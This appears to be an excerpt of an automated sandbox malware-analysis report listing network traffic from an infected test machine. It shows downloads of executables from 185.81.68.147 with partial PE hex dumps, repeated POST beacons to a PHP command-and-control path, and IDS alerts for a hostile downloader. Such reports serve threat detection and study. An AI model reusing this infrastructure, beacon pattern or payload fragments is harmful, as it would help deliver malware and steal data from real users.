                    Source: global trafficTCP traffic: 192.168.2.8:49710 -> 185.81.68.147:1912
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 15 Dec 2024 16:15:35 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 10:50:51 GMTETag: "4b200-629107cd804d2"Accept-Ranges: bytesContent-Length: 307712Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 e2 02 00 00 20 00 00 00 e4 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c6 c9 01 00 00 20 03 00 00 ca 01 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 02 00 00 00 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 02 03 00 00 00 00 00 48 00 00 00 02 00 05 00 20 83 01 00 1c 7f 01 00 03 00 00 00 8f 02 00 06 28 77 01 00 f8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 75 00 74 00 6f 00 66 00 69 00 6c 00 6c 00 35 00 74 00 59 00 57 00 52 00 71 00 61 00 57 00 56 00 6f 00 61 00 6d 00 68 00 68 00 61 00 6d 00 4a 00 38 00 57 00 57 00 39 00 79 00 62 00 32 00 6c 00 58 00 59 00 57 00 78 00 73 00 5a 00 58 00 51 00 4b 00 61 00 57 00 4a 00 75 00 5a 00 57 00 70 00 6b 00 5a 00 6d 00 70 00 74 00 62 00 57 00 74 00 77 00 59 00 32 00 35 00 73 00 63 00 47 00 56 00 69 00 61 00 32 00 78 00 74 00 62 00 6d 00 74 00 76 00 5a 00 57 00 39 00 70 00 61 00 47 00 39 00 6d 00 5a 00 57 00 4e 00 38 00 56 00 48 00 4a 00 76 00 62 00 6d 00 78 00 70 00 62 00 6d 00 73 00 4b 00 61 00 6d 00 4a 00 6b 00 59 00 57 00 39 00 6a 00 62 00 6d 00 56 00 70 00 61 00 57 00 6c 00 75 00 62 00 57 00 70 00 69 00 61 00 6d 00 78 00 6e 00 59 00 57 00 78 00 6f 00 59 00 32 00 56 00 73 00 5a 00 32 00 4a 00 6c 00 61 00 6d 00 31 00 75 00 61 00 57 00 52 00 38 00 54 00 6d 00 6c 00 6d 00 64 00 48 00 6c 00 58 00 59 00 57 00 78 00 73 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 15 Dec 2024 16:15:38 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Sat, 14 Dec 2024 13:10:00 GMTETag: "5a4536-6293aaa2cd4c8"Accept-Ranges: bytesContent-Length: 5915958Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 a8 83 5d 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 dd 61 5a 00 02 00 60 c1 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c c7 03 00 78 00 00 00 00 90 04 00 1c f4 00 00 00 60 04 00 08 22 00 00 00 00 00 00 00 00 00 00 00 90 05 00 68 07 00 00 c0 9d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9c 03 00 40 01 00 00 00 00 00 00 00 00 00 00 00 b0 02 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 92 02 00 00 10 00 00 00 94 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 42 26 01 00 00 b0 02 00 00 28 01 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 73 00 00 00 e0 03 00 00 0e 00 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 08 22 00 00 00 60 04 00 00 24 00 00 00 ce 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1c f4 00 00 00 90 04 00 00 f6 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 07 00 00 00 90 05 00 00 08 00 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 15 Dec 2024 16:15:49 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Sun, 15 Dec 2024 06:09:39 GMTETag: "4ba00-62948e8bd5049"Accept-Ranges: bytesContent-Length: 309760Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 eb 5a 12 27 8a 34 41 27 8a 34 41 27 8a 34 41 2e f2 a7 41 24 8a 34 41 27 8a 35 41 2d 8a 34 41 48 fc 9f 41 2d 8a 34 41 48 fc ae 41 26 8a 34 41 48 fc a9 41 26 8a 34 41 52 69 63 68 27 8a 34 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 92 72 5e 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 34 00 00 00 00 00 00 18 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 72 00 00 28 00 00 00 00 a0 00 00 28 03 00 00 00 90 00 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b2 23 00 00 00 50 00 00 00 24 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 4c 02 00 00 00 90 00 00 00 04 00 00 00 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 28 03 00 00 00 a0 00 00 00 04 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 36 34 00 00 00 00 00 50 04 00 00 b0 00 00 00 50 04 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: Joe Sandbox ViewIP Address: 185.81.68.147 185.81.68.147
                    Source: Joe Sandbox ViewASN Name: KLNOPT-ASFI KLNOPT-ASFI
                    Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.8:49708 -> 185.81.68.147:80
                    Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.8:49709 -> 185.81.68.147:80
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 37
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: GET /ssg.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                    Source: global trafficHTTP traffic detected: GET /zx.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                    Source: global trafficHTTP traffic detected: GET /update.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
